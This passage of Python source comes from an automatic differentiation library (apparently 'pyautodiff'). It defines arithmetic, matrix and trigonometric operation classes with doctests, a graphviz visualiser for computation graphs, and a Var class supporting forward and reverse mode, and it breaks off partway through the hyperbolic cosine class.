    >>> Var(1, 'x') - 1
    (<class 'pyautodiff.var.Var'> name: None val: 0, der: {'x': array([[[[1.]]]])})
    >>> Var(1, 'x') - Var(2, 'y')
    (<class 'pyautodiff.var.Var'> name: None val: -1, der: {'x': array([[[[1.]]]]), 'y': array([[[[-1.]]]])})
    """
    n_operands = 2
    symbol = "-"

    @classmethod
    def op(cls, va, vb):
        return va - vb

    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # The subtrahend enters with a negated derivative.
        return 1, -1
class VarMul(Ops):
    """
    Binary (element-wise) multiplication: c = a * b.

    Local derivatives: dc/da = b and dc/db = a.

    >>> Var(1, 'x') * 2
    (<class 'pyautodiff.var.Var'> name: None val: 2, der: {'x': array([[[[2.]]]])})
    >>> Var(1, 'x') * Var(2, 'y')
    (<class 'pyautodiff.var.Var'> name: None val: 2, der: {'x': array([[[[2.]]]]), 'y': array([[[[1.]]]])})
    """
    n_operands = 2
    symbol = "*"

    @classmethod
    def op(cls, va, vb):
        return va * vb

    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # Product rule: each operand's derivative is the other operand's value.
        return vb, va
class VarTrueDiv(Ops):
    """
    A class for division: c = a / b. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> Var(4, 'x') / 2
    (<class 'pyautodiff.var.Var'> name: None val: 2.0, der: {'x': array([[[[0.5]]]])})
    >>> Var(4, 'x') / Var(2, 'y')
    (<class 'pyautodiff.var.Var'> name: None val: 2.0, der: {'x': array([[[[0.5]]]]), 'y': array([[[[-1.]]]])})
    """
    n_operands = 2
    symbol = "/"

    @classmethod
    def op(cls, va, vb):
        return va / vb

    @classmethod
    def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
        # c = a / b  =>  dc/da = 1/b and dc/db = -a/b^2 = -c/b.
        # The skip flags avoid computing the derivative w.r.t. a constant operand.
        if skip_ldb:
            return 1 / vb, 0
        if skip_lda:
            return 0, -vc / vb
        return 1 / vb, -vc / vb
class VarPow(Ops):
    """
    A class for the power operation: c = a ** b. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> Var(2, 'x') ** 2
    (<class 'pyautodiff.var.Var'> name: None val: 4, der: {'x': array([[[[4.]]]])})
    >>> Var(4, 'x') ** Var(2, 'y')
    (<class 'pyautodiff.var.Var'> name: None val: 16, der: {'x': array([[[[8.]]]]), 'y': array([[[[22.18070978]]]])})
    """
    n_operands = 2
    symbol = "power"

    @classmethod
    def op(cls, va, vb):
        return va ** vb

    @classmethod
    def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
        """ Derivatives w.r.t. va and vb: dc/da = b * a^(b-1); dc/db = a^b * ln(a) = c * ln(a).
        The skip flags avoid computing the derivative w.r.t. a constant operand.
        """
        if skip_ldb:
            return vb * (va ** (vb - 1)), 0
        if skip_lda:
            return 0, np.log(va) * vc
        return vb * (va ** (vb - 1)), np.log(va) * vc
class VarExp(Ops):
    """
    Exponential function: c = e^a.

    The local derivative reuses the already-computed output, since
    d(e^a)/da = e^a = c.

    >>> exp(Var(0, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 1.0, der: {'x': array([[[[1.]]]])})
    """

    @classmethod
    def op(cls, va, vb):
        # vb is unused: exp is a unary operation.
        return np.exp(va)

    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # d(e^a)/da = e^a, which is exactly the output value vc.
        return vc
class VarLog(Ops):
    """
    A class for the logarithm with an arbitrary base: c = log_vb(va).
    Gives the value and local derivative. This class inherits from the Ops Class.
    >>> log(Var(1, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
    """
    n_operands = 2

    @classmethod
    def op(cls, va, vb):
        """ log_vb(va), via the change-of-base formula ln(va) / ln(vb). """
        return np.log(va) / np.log(vb)

    @classmethod
    def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
        """ dc/da = 1/(a*ln(b)); dc/db = -log_b(a)/(b*ln(b)) = -c/(b*ln(b)).
        The skip flags avoid computing the derivative w.r.t. a constant operand.
        """
        inv_log_vb = 1 / np.log(vb)  # shared factor, hoisted
        if skip_ldb:
            return 1 / va * inv_log_vb, 0
        if skip_lda:
            return 0, -vc * inv_log_vb / vb
        return 1 / va * inv_log_vb, -vc * inv_log_vb / vb

    @classmethod
    def binary_operation_with_base(clf, a, base=math.e):
        """ Wrap function to explicitly specify the base (natural log by default). """
        return clf.binary_operation(a, base)
class VarLogistic(Ops):
    """
    Logistic (sigmoid) function: c = 1 / (1 + e^(-a)).

    >>> sigmoid((Var(0, 'x')))
    (<class 'pyautodiff.var.Var'> name: None val: 0.5, der: {'x': array([[[[0.25]]]])})
    """

    @classmethod
    def op(cls, va, vb):
        return 1 / (1 + np.exp(-va))

    @classmethod
    def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
        # The sigmoid derivative expressed through its output: c * (1 - c).
        return vc * (1 - vc)
class VarMatMul(Ops):
    """
    Matrix multiplication: c = a @ b.
    >>> (Var(np.array([[1],[2]]), 'x') @ Var(np.array([[0,1]]), 'y')).val.tolist()
    [[0, 1], [0, 2]]
    """
    n_operands = 2
    symbol = "@"

    @classmethod
    def op(cls, va, vb):
        return va @ vb

    @classmethod
    def local_derivative(cls, va, vb, vc, skip_lda=False, skip_ldb=False):
        # For matmul the "local derivatives" are the operand values themselves;
        # the overridden chain_rule below contracts them on the proper axes.
        return vb, va

    @classmethod
    def chain_rule(cls, lda, da, ldb, db, forward_mode=True):
        """
        Apply the chain rule for matmul: c = a @ b.
        Args:
            lda: A Number or np.ndarray, represents the local derivative: dc/da (b.val in this case)
            da: a dict stores the derivative of a.
                For example, {'x': da/dx, 'y': da/dy}, where `x`,'y' is the involved variables.
            ldb: A Number or np.ndarray, represents the local derivative: dc/db (a.val in this case)
            db: a dict stores the derivative of b.
                For example, {'x': db/dx, 'y': db/dy}, where `x`,'y' is the involved variables.
            forward_mode: True for forward accumulation (dc/dx tensors), False for
                reverse/mix backprop (df/dc tensors); selects the einsum contraction.
        Returns:
            A dict stores the derivative of c by applying the chain rule. For example,
            {'x': dc/dx, 'y': dc/dy} where `x`,'y' is the involved variables.
        """
        def _apply(d, ld, s):
            # Skip the absent operand and contract each stored 4D derivative
            # with the other operand's value matrix.
            if d is None:
                return
            for wrt in d:
                dc[wrt] += np.einsum(s, d[wrt], ld)
        dc = defaultdict(int)
        _apply(da, lda, "pqkl,qr->prkl" if forward_mode else "mnpr,qr->mnpq")
        _apply(db, ldb, "qrkl,pq->prkl" if forward_mode else "mnpr,pq->mnqr")
        return dict(dc)
class VarTranspose(Ops):
    """
    Transpose matrix: c = a.T.
    >>> (Var(np.array([[1,2]]), 'x').T).val.tolist()
    [[1], [2]]
    """
    symbol = ".T"

    @classmethod
    def op(cls, va, vb):
        return np.transpose(va)

    @classmethod
    def fwdprop(cls, a, b, val):
        # Forward mode: transposing c swaps the element axes (first pair) of
        # the 4D derivative tensor, i.e. dc/dx[i,j,k,l] = da/dx[j,i,k,l].
        der = {}
        for wrt in a.derivative:
            der[wrt] = np.einsum('ijkl->jikl', a.derivative[wrt])
        return der

    @classmethod
    def backprop(cls, a, b, val, dfdc):
        # Reverse mode: swap the wrt axes (last pair) of df/dc, since c's
        # element (k,l) is a's element (l,k).
        bp = {}
        for wrt in dfdc:
            bp[wrt] = np.einsum('ijkl->ijlk', dfdc[wrt])
        a._bpgrad.update(bp)

    @classmethod
    def unary_operation(cls, a):
        """
        Specialized unary pipeline for transpose (same flow as Ops.unary_operation,
        kept separate because fwdprop/backprop here permute axes instead of
        applying an element-wise local derivative).
        Args:
            a: a Number or np.ndarray or `Var` instance, the first operand of the calculation
        Returns:
            A `Var` instance whose `.val` is the numerical value of the operation and `.derivative` containing
            the derivative w.r.t. the involved variables.
        """
        if not isinstance(a, Var):
            a = Var(a)
        val = cls.op(a.val, None)
        mode = a.mode
        params = dict(derivative={},
                      _var_shapes=cls.merge_var_shapes(a._var_shapes),
                      mode=mode,
                      _context=[cls, [a]])
        # Reverse/mix mode: defer derivative computation until .diff() is called.
        if mode not in (Mode.Forward, Mode.NONE):
            return Var(val, **params)
        params["derivative"] = cls.fwdprop(a, None, val)
        return Var(val, **params)
# Wire the operation classes onto Var's dunder methods so plain Python
# operators (-x, abs(x), x + y, ...) build the autodiff graph.
Var.__neg__ = _dunder_wrapper(VarNeg.unary_operation, True)
Var.__pos__ = _dunder_wrapper(VarPos.unary_operation, True)
Var.__abs__ = _dunder_wrapper(VarAbs.unary_operation, True)
# +=, -=, *=, /= are auto enabled.
Var.__radd__ = Var.__add__ = _dunder_wrapper(VarAdd.binary_operation)
Var.__sub__ = _dunder_wrapper(VarSub.binary_operation)
# Reflected (r-prefixed) variants swap the operand order for `const op Var`.
Var.__rsub__ = lambda a, b: VarSub.binary_operation(b, a)
Var.__rmul__ = Var.__mul__ = _dunder_wrapper(VarMul.binary_operation)
Var.__truediv__ = _dunder_wrapper(VarTrueDiv.binary_operation)
Var.__rtruediv__ = lambda a, b: VarTrueDiv.binary_operation(b, a)
Var.__pow__ = _dunder_wrapper(VarPow.binary_operation)
Var.__rpow__ = lambda a, b: VarPow.binary_operation(b, a)
# Module-level convenience function; note this shadows the builtin `pow`.
pow = VarPow.binary_operation
# TODO: Fan
Var.__matmul__ = _dunder_wrapper(VarMatMul.binary_operation)
Var.transpose = transpose = _dunder_wrapper(VarTranspose.unary_operation, True)
exp = VarExp.unary_operation  # enable exp(x)
Var.exp = _dunder_wrapper(exp, True)  # enable x.exp()
log = VarLog.binary_operation_with_base
Var.log = _dunder_wrapper(log)
logistic = sigmoid = VarLogistic.unary_operation
Var.sigmoid = _dunder_wrapper(sigmoid, True)
sqrt = lambda x: x ** 0.5  # derived op: composed from __pow__, hence differentiable
Var.sqrt = sqrt
import time
from enum import Enum
import numpy as np
from graphviz import Digraph
from pyautodiff import Mode
class NodeType(Enum):
    # Role of a node in the rendered graph -- user variable, constant literal,
    # or operation; drives the color/shape/style lookups in Viser below.
    var = 0
    const = 1
    operation = 2
class Viser(object):
    """
    A class to draw the computational graph and auto diff trace by graphviz.Digraph (directed graph).
    To distinguish the computational graph and the AD trace, two families of arrow will be used:
    1. For the computational graph, use full arrow. Black one represents the first operand, white one represents the
    second operand.
    2. For the AD trace, use half arrow. Black one represents the Forward mode and the white for the reverse/mix mode.
    If the arrow has the upper part, it indicates the var is the first operand; the lower part indicates the second
    operand.
    To use:
        Viser(Var(1, 'x') + Var(2, 'y'), draw_AD_trace=False)
    """
    def __init__(self, x, draw_AD_trace=False, horizontal=True):
        """
        Args:
            x: a Var instance containing the operation result
            draw_AD_trace: defaults to False, plot the computational graph. If True, draw the AD trace
            horizontal: defaults to True, extend the plot horizontally (left->right); If False, draw the plot
                vertically (top->down).
        """
        self.n_nodes = 1  # running node count, mixed into unique node ids
        self.ad_trace = draw_AD_trace
        self.g = Digraph('Trace', format='png')
        if horizontal:
            self.g.attr(rankdir='LR')
        # Root node "0" stands for the final output; drawing starts from it.
        self.g.node("0", label="output")
        self._draw(x, "0")
    @staticmethod
    def _get_op_symbol(cls):
        """
        Return the symbol of operation to display on the plot. For example, symbol of VarAdd: "+".
        Args:
            cls: Operation class
        Returns:
            a string: cls.symbol if set, otherwise the class-name suffix (e.g. "Exp" for VarExp)
        """
        if cls.symbol is None:
            return cls.__name__[3:]
        return cls.symbol
    def _get_unique_id(self):
        """
        Generate a unique id for node.
        Returns:
            a string for id
        """
        return f"{time.process_time()}_{self.n_nodes}"
    @staticmethod
    def _get_color(xtype):
        """
        Return the color for node by node(var) type.
        Args:
            xtype: node type
        Returns:
            a string for color
        """
        return {
            NodeType.var: None,
            NodeType.const: "darkseagreen2",
            NodeType.operation: "lavender",
        }[xtype]
    @staticmethod
    def _get_shape(xtype):
        """
        Return the shape for node by node(var) type.
        Args:
            xtype: node type
        Returns:
            a string for shape
        """
        return {
            NodeType.var: "oval",
            NodeType.const: "oval",
            NodeType.operation: "box",
        }[xtype]
    @staticmethod
    def _get_style(xtype):
        """
        Return the box style for node by node(var) type.
        Args:
            xtype: node type
        Returns:
            a string for box style
        """
        return {
            NodeType.var: None,
            NodeType.const: "filled",
            NodeType.operation: "filled",
        }[xtype]
    @staticmethod
    def _get_arrow(is_second_operand=False, ad=False, reverse_mode=False):
        """
        Return the graphviz arrowhead name for an edge.

        Full arrows ("normal"/"onormal") mark the computational graph; half
        arrows ("l"/"r" variants) mark the AD trace. Hollow ("o"-prefixed)
        arrowheads mark the second operand in the computational graph and the
        reverse/mix mode in the AD trace; "l" vs "r" distinguishes first vs
        second operand in the AD trace.
        Args:
            is_second_operand: True if the edge belongs to the second operand
            ad: True when drawing the AD trace instead of the computational graph
            reverse_mode: True for reverse/mix mode edges (AD trace only)
        Returns:
            a string naming a graphviz arrowhead type
        """
        if ad:
            if reverse_mode:
                return "ornormal" if is_second_operand else "olnormal"
            return "rnormal" if is_second_operand else "lnormal"
        return "onormal" if is_second_operand else "normal"
    @staticmethod
    def _beatify_val(val):
        """Keep at most 3 digits for float"""
        return np.around(val, 3)
    def _draw(self, x, father, is_second_operand=False):
        """
        Draw the graph recursively. The graph is stored in self.g.
        Be careful, the direction of the arrow is determined by the propagation direction.
        Args:
            x: a var instance, a member of a composite operation
            father: x's "previous" node.
            is_second_operand: True/False
        Returns:
            None
        """
        try:
            # Operation results carry a _context; plain variables/constants
            # raise here and fall through to the except branch below.
            cls, operands = x._context
            xid = self._get_unique_id()
            xlabel = self._get_op_symbol(cls)
            xtype = NodeType.operation
        except:
            operands = []
            if x.name is None:
                # Unnamed var: a constant, labelled with its (rounded) value.
                xid = self._get_unique_id()
                xlabel = f"{self._beatify_val(x.val)}"
                xtype = NodeType.const
            else:
                # Named var: the name serves as both node id and label.
                xid = xlabel = x.name
                xtype = NodeType.var
        self.g.node(xid, label=xlabel,
                    color=self._get_color(xtype),
                    shape=self._get_shape(xtype),
                    style=self._get_style(xtype))
        if father is not None:
            if self.ad_trace and x.mode != Mode.Forward:
                # Reverse/mix AD trace: the gradient flows father -> x.
                self.g.edge(father, xid, arrowhead=self._get_arrow(is_second_operand, True, True))
            else:
                self.g.edge(xid, father, arrowhead=self._get_arrow(is_second_operand, self.ad_trace, False))
        for i, t in enumerate(operands):
            self._draw(t, xid, i == 1)
    def show(self):
        """Show the plot. For IPython/jupyter notebook, call "self.g" directly"""
        self.g.view(cleanup=True, directory="/tmp")
    def save(self, path):
        """Pass in a string as path, save the plot to local"""
        self.g.render(path)
from enum import Enum
from collections import deque, defaultdict, Counter
import time
from numbers import Number
import numpy as np
"""A global counter to count the total number of VarAutoName instances"""
G_VAR_AUTO_NAME_NUM = 0
class Mode(Enum):
    # Differentiation mode of a Var node:
    #   Forward - derivatives are propagated eagerly with each operation.
    #   Reverse - derivatives are computed later by backprop (when .diff() is called).
    #   Mix     - produced when a Forward var is combined with a non-Forward var.
    #   NONE    - constants: no derivative is tracked.
    Forward = 0
    Reverse = 1
    Mix = 2
    NONE = -1
class Var(object):
    """
    A class that holds variables with AutoDiff method in both forward and reverse mode.
    Supports 20+ elementary functions (see ../ops.py) for scalar(Number) and 2D matrix (np.ndarray).
    Attributes:
        val (Number or np.ndarray): numerical value of this variable.
        name (str or Number, optional): name assigned to the variable, such as "x","longlongname" or 1.1, 2.
        derivative (dict): a dict that stores the derivative values w.r.t all involved variables. For example,
            {"x": numerical value of dfdx, "y": numerical value of dfdy}. A 4D matrix D is used to represent
            the single der such as dcdx: D_{ijkl} represents dc_{ij}/dx_{kl}.
        mode (Mode): for newly declared instance, specify Forward or Reverse mode. The Mix mode will come from
            the operation of a Forward mode and a non-Forward mode.
        _var_shapes (dict): a dict that stores the shape of the involved variables used for squeezing the 4D
            derivative matrix to 2D Jacobian matrix if necessary. For example, {"x": (1,1), "y": (2,1)}.
            LEAVE IT ALONE when declare a new Var instance.
        _context (list): [cls, operands] where "cls" represents the operation and operands is [a, b] if cls is
            a binary operation else [a] for unary operation. LEAVE IT ALONE when declare a new Var instance.
        _bpgrad (dict): a dict stores the temporary backpropagation gradiant, used for reverse mode only.
            For example, u.bp = {f: 1} means dfdu = 1. The key here is the hash value of f (output, a Var instance)
            while the key in u.derivative is the name of x (input, a Var instance). Similarly, a 4D matrix D is used
            to represent a single gradient dfdc: D_{ijkl} represents df_{ij}/dc_{kl}.
        _degree (int): "out degree" = number of usage in the computational graph, used for reverse mode only.
    """

    def __init__(self, val, name=None, derivative=None, mode=Mode.Forward, _var_shapes=None, _context=None):
        """
        Args:
            val (Number or np.ndarray): numerical value of the variable.
            name (str or Number, optional): name of the variable. If None(default), the variable will be treated
                as a constant, which means no derivative wrt this instance.
            derivative (Number or np.ndarray, optional): a dict; Defaults to None. If name is None, derivative will be
                set as an empty dict; If name is not None, derivative will be initialized as {name: 4D_matrix};
                Number/np.ndarray can be passed in as the `seed` for this variable (name should not be None and the
                shape of seed should match its value).
            mode (Mode): Forward(default)/Reverse. The mode of const will be set as Mode.NONE.
            _var_shapes (dict or None): Leave it None when declare an instance. See explanations above.
            _context (list or None): Leave it None when declare an instance. See explanations above.
        To use:
            >>> x = Var(1, 'x', mode=Mode.Forward)
            >>> y = Var(np.array([[1],[2]]), 'y', mode=Mode.Reverse)
        """
        self._val = val
        if name is None or isinstance(name, (str, Number)):
            self.name = name
        else:
            raise TypeError(f"name should be a str or Number, {type(name)} is not supported.")
        # Init derivative
        if isinstance(derivative, dict):
            self.derivative = derivative
        elif name is not None:
            self.derivative = {name: self._init_seed(val, derivative)}
        else:
            if derivative is not None:
                raise ValueError("Need a name!")
            # Use {} instead of None to skip the type check when self.derivative is used
            self.derivative = {}
        # Be careful, this dict is designed for sharing across multiple instances
        # which means for x = Var(1, 'x'), x._var_shapes can contain key="y" that is not x's "target wrt var"
        self._var_shapes = _var_shapes
        if name is not None:
            # Explicit None check instead of the previous bare try/except, which
            # could silently swallow unrelated errors from exotic _var_shapes values.
            if self._var_shapes is None:
                self._var_shapes = {name: np.shape(val)}
            else:
                self._var_shapes[name] = np.shape(val)
        self.mode = Mode.NONE if self.is_const else mode
        self._context = _context
        # Used only for reverse mode; populated when ._reverse_diff() is called.
        # Fix: this attribute was previously initialized as `_degrees` (typo)
        # while _reverse_diff()/_backward() and the class docstring use `_degree`.
        self._degree = None
        self._bpgrad = None

    def _init_seed(self, val, seed=None):
        """
        Initialize the derivative for newly declared var instance. The shape of seed should match the shape of val.
        Or exception will be thrown out. If val is scalar, seed must be a scalar too; If val is matrix, seed could
        be a scalar or a matrix.
        Args:
            val: var's value, used for aligning the shape of val and derivative
            seed: a Number or np.ndarray, defaults to None.
        Returns:
            a 4D matrix as the initial derivative.
        For example (this function will be called in __init__):
            >>> Var(1, 'x', 100).derivative['x'].tolist()
            [[[[100.0]]]]
            >>> Var(np.array([[1],[2]]), 'x', 2).derivative['x'].tolist() # output is np.ndarray
            [[[[2.0], [0.0]]], [[[0.0], [2.0]]]]
            >>> Var(np.array([[1],[2]]), 'x', np.array([[100],[200]])).derivative['x'].tolist()
            [[[[100.0], [0.0]]], [[[0.0], [200.0]]]]
        """
        if seed is None:
            seed = 1
        elif not isinstance(seed, (Number, np.ndarray, list)):
            raise TypeError(f"Init derivative(seed) should be a ndarray or Number, {type(seed)} is not supported.")
        seed = np.array(seed)
        ndim = np.ndim(val)
        # Init seed should be a scalar or the shape of seed should be equal to the shape of value
        assert np.ndim(seed) == 0 or np.size(seed) == np.size(val), (
            f"Initial derivative {np.shape(seed)} should match the shape of val {np.shape(val)}")
        if ndim == 2:
            k, l = val.shape
        elif ndim == 0:
            k = l = 1
        else:
            raise ValueError(f"Val only support scalar/2D-matrix. Input: {val.shape}")
        # D_{ijkl} = seed on the "diagonal" (i==k and j==l), zero elsewhere
        return np.einsum('ij,kl->ikjl', np.eye(k) * seed, np.eye(l))

    def __str__(self):
        return f"(val: {self.val}, der: {self.derivative})"

    def __repr__(self):
        return f"({self.__class__} name: {self.name} val: {self.val}, der: {self.derivative})"

    def __eq__(self, b):
        """Only compare the `val` and `derivative` (via np.allclose). `name` is ignored."""
        if not isinstance(b, Var) or not np.allclose(self.val, b.val) or not (
                self.derivative.keys() == b.derivative.keys()):
            return False
        for wrt in self.derivative.keys():
            # TODO: Fan
            # Use np.array_equal instead to check the shape?
            if not np.allclose(self.derivative[wrt], b.derivative[wrt]):
                return False
        return True

    @property
    def val(self):
        """Return numerical value of variable"""
        return self._val

    @val.setter
    def val(self, v):
        """Set numerical value for variable"""
        self._val = v

    def _squeeze_der(self, name, v):
        """
        Squeeze the 4D derivative matrix to match the expectation of Jacobian matrix. The output shape is listed below:
        Input type --> output type: Jacobian matrix type
        Scalar --> scalar: scalar
        Scalar --> vector((n,1) or (1,n)): 2D matrix(n,1)
        Vector((n,1) or (1,n)) --> scalar: 2D matrix(1,n)
        Vector((n,1) or (1,n)) --> Vector((m,1) or (1,m)): 2D matrix(m,n)
        Matrix((m,n)) --> matrix((p,q)): 3D matrix if one of m,n,p,q is 1 else 4D matrix
        Args:
            name: name of target var instance
            v: 4D derivative matrix
        Returns:
            A scalar or matrix, the squeezed derivative.
        """
        shape = self._var_shapes[name]
        if len(shape) == 0:
            # wrt-variable is a scalar: collapse to a scalar if possible,
            # otherwise drop the two trailing singleton axes.
            try:
                return v.item()
            except:
                return np.squeeze(np.squeeze(v, -1), -1)
        m, n, k, l = v.shape
        assert (k, l) == shape, f"var shape {shape} and der shape: {self.val.shape} mismatch!"
        if l == 1:
            v = np.squeeze(v, -1)
        elif k == 1:
            v = np.squeeze(v, -2)
        if n == 1:
            v = np.squeeze(v, 1)
        elif m == 1:
            v = np.squeeze(v, 0)
        return v

    def __hash__(self):
        # Identity hash (deliberately not consistent with __eq__): instances are
        # used as Counter/dict keys in the reverse-mode graph traversal, where
        # distinct nodes with equal values must stay distinct.
        return id(self)

    def _count_degrees(self):
        """
        Count "out degree" for every involved var instance for reverse mode.
        Returns: a dict where key = node, val = out degree
        """
        q = deque()
        q.append(self)
        degrees = Counter()
        visited = defaultdict(bool)
        # BFS over the computational graph following _context back-links
        while len(q) > 0:
            v = q.popleft()
            if v._context is None:
                continue
            _, operands = v._context
            for t in operands:
                degrees[t] += 1
                if not visited[t]:
                    visited[t] = True
                    q.append(t)
        return degrees

    def _backward(self):
        """
        Recursively trace back along the computational graph to propagate the derivative from output to input.
        See more explanations in code comments.
        """
        # Two cases to "merge" the .derivative from the forward propagation and ._bpgrad from the back propagation
        # if self.derivative is not None, two possible cases:
        # 1. For target vars like x,y whose .derivative is initialized when declared;
        # 2. For mix mode calculation, some node in forward mode in the trace has non-empty .derivative
        # Be careful, the merged derivative could be part of the total derivative so we need to accumulate all.
        if len(self.derivative) > 0:
            from pyautodiff import Ops
            # f: a var instance, dfdc: numerical derivative for dfdc (suppose current instance(self) is c)
            f, dfdc = self._bpgrad.popitem()
            # Merge two 4D matrix
            d = Ops.merge_fwd_backprop(self.derivative, dfdc)
            # Accumulate the derivatives
            f.derivative = Counter(f.derivative)
            f.derivative.update(d)
            f.derivative = dict(f.derivative)
        elif self._context is not None:
            cls, operands = self._context
            cls.backprop(operands[0],
                         operands[1] if len(operands) == 2 else None,
                         self.val,
                         self._bpgrad)
            # Clear it for next BP
            self._bpgrad.popitem()
            for t in operands:
                t._degree -= 1
                # When t.degree is 0, dfdt is complete and safe to trace back
                if t._degree == 0:
                    t._backward()

    def _reverse_diff(self):
        """
        Start AD of reverse mode.
        """
        degrees = self._count_degrees()
        for t in degrees:
            t._degree = degrees[t]
            t._bpgrad = Counter()
        # Seed the output node with d(self)/d(self) = identity
        self._bpgrad = {self: self._init_seed(self.val)}
        self._backward()

    def diff(self, wrts=None, return_raw=False):
        """
        Get derivative w.r.t. to each var in `wrts`.
        Args:
            wrts: single variable name or a list/tuple of variable names. Defaults to None, equals to `all`.
            return_raw: if True, return the raw 4D derivative matrices instead of squeezed Jacobians.
        Returns:
            a Number or np.ndarray if wrts is single variable name;
            or a list of Number or np.ndarray that corresponds to each variable name in wrts, if wrts is a list/tuple;
            or a dict with the variable name as a key and value as a Number or np.ndarray, if wrts is None.
        """
        # Reverse mode: derivatives are computed lazily, on the first diff() call
        if len(self.derivative) == 0 and self._context is not None:
            self._reverse_diff()
        der = self.derivative
        keys = list(der.keys())
        if not return_raw:
            der = {x: self._squeeze_der(x, der[x]) for x in keys}
        if wrts is None:
            if len(keys) == 0:
                return 0
            if len(keys) == 1:
                return der[keys[0]]
            return der
        elif isinstance(wrts, (list, tuple)):
            return [der.get(w, 0) for w in wrts]
        else:
            try:
                return der[wrts]
            except:
                raise TypeError(f"wrts only supports None/list/tuple or a var name!")

    @property
    def T(self):
        """
        To support x.T
        Returns: Transposed matrix
        """
        return self.transpose()

    @property
    def is_const(self):
        """Const like: Var(1)"""
        return self._var_shapes is None
class VarAutoName(Var):
    """
    A wrapper class for class `Var`. Variable names are auto-generated by combining the current number of
    instances of `VarAutoName` and system process time to avoid duplicate names.
    """
    def __init__(self, val, derivative=None, mode=Mode.Forward):
        """
        Args:
            val (Number or np.ndarray): numerical value; same as `val` in `Var`.
            derivative: a dict or a Number/np.ndarray. Defaults to None. Same as `derivative` in `Var`.
            mode (Mode): Forward(default)/Reverse; same as `mode` in `Var`.
        """
        # TODO: Fan
        # Add a Lock to protect G_VAR_AUTO_NAME_NUM
        global G_VAR_AUTO_NAME_NUM
        G_VAR_AUTO_NAME_NUM += 1
        # "<counter>_<process time>" keeps auto names unique within one process
        name = f"{G_VAR_AUTO_NAME_NUM}_{time.process_time()}"
        super().__init__(val, name=name, derivative=derivative, mode=mode)
    @staticmethod
    def clear_var_counter():
        """
        Clears G_VAR_AUTO_NAME_NUM in case of overflow.
        Returns: None
        """
        global G_VAR_AUTO_NAME_NUM
        G_VAR_AUTO_NAME_NUM = 0
import numpy as np
from pyautodiff import Var, Ops
from pyautodiff.ops import _dunder_wrapper
class VarSin(Ops):
    """
    A class for trigonometric sine operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> sin(Var(0, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
    """
    @classmethod
    def op(cls, va, vb):
        # vb is unused: sine is unary (binary signature kept for the Ops API).
        return np.sin(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # d/dx sin(x) = cos(x)
        return np.cos(va)
class VarCos(Ops):
    """
    A class for trigonometric cosine operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> cos(Var(0, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 1.0, der: {'x': array([[[[0.]]]])})
    """
    @classmethod
    def op(cls, va, vb):
        # vb is unused: cosine is unary.
        return np.cos(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # d/dx cos(x) = -sin(x)
        return -np.sin(va)
class VarTan(Ops):
    """
    A class for trigonometric tangent operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> tan(Var(0, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
    """
    @classmethod
    def op(cls, va, vb):
        # vb is unused: tangent is unary.
        return np.tan(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # d/dx tan(x) = sec(x)^2 = (1/cos(x))^2
        return (1 / np.cos(va)) ** 2
class VarArcSin(Ops):
    """
    A class for trigonometric arcsine operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> arcsin(Var(0, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
    """
    @classmethod
    def op(cls, va, vb):
        # vb is unused: arcsine is unary.
        return np.arcsin(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # d/dx arcsin(x) = 1 / sqrt(1 - x^2)
        return 1 / np.sqrt(1 - va ** 2)
class VarArcCos(Ops):
    """
    A class for trigonometric arccosine operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> arccos(Var(0, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 1.5707963267948966, der: {'x': array([[[[-1.]]]])})
    """
    @classmethod
    def op(cls, va, vb):
        # vb is unused: arccosine is unary.
        return np.arccos(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # d/dx arccos(x) = -1 / sqrt(1 - x^2)
        return -1 / np.sqrt(1 - va ** 2)
class VarArcTan(Ops):
    """
    A class for trigonometric arctangent operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> arctan(Var(0, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
    """
    @classmethod
    def op(cls, va, vb):
        # vb is unused: arctangent is unary.
        return np.arctan(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        # d/dx arctan(x) = 1 / (1 + x^2)
        return 1 / (1 + va ** 2)
class VarSinH(Ops):
    """
    A class for trigonometric hyperbolic sine operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> sinh(Var(0, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 0.0, der: {'x': array([[[[1.]]]])})
    """
    @classmethod
    def op(cls, va, vb):
        # vb is unused: sinh is unary.
        return np.sinh(va)
    @classmethod
    def local_derivative(cls, va, vb, vc, **kwargs):
        """ derivative of sinh(x) = cosh(x)"""
        return np.cosh(va)
class VarCosH(Ops):
    """
    A class for trigonometric hyperbolic cosine operation. Gives the value and local derivative.
    This class inherits from the Ops Class.
    >>> cosh(Var(0, 'x'))
    (<class 'pyautodiff.var.Var'> name: None val: 1.0, der: {'x': array([[[[0.]]]])})
    """
    @classmethod
    def op(cls, va, vb):
